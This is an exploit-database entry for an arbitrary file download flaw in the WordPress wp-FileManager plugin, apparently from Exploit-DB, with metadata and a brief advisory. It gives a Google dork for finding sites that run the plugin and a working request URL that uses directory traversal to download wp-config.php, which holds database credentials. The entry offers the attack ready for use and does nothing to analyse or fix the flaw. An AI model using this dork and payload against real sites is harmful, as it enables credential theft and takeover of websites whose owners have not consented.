WordPress Plugin wp-FileManager - Arbitrary File Download

Author: ByEge
type: webapps
platform: php
port: 
date_added: 2013-05-14 
date_updated: 2013-05-15 
verified: 1 
codes: OSVDB-93446 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt25500/screen-shot-2013-05-15-at-83506-am.png 
application_url: http://www.exploit-db.comwp-filemanager.1.3.0.zip

Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.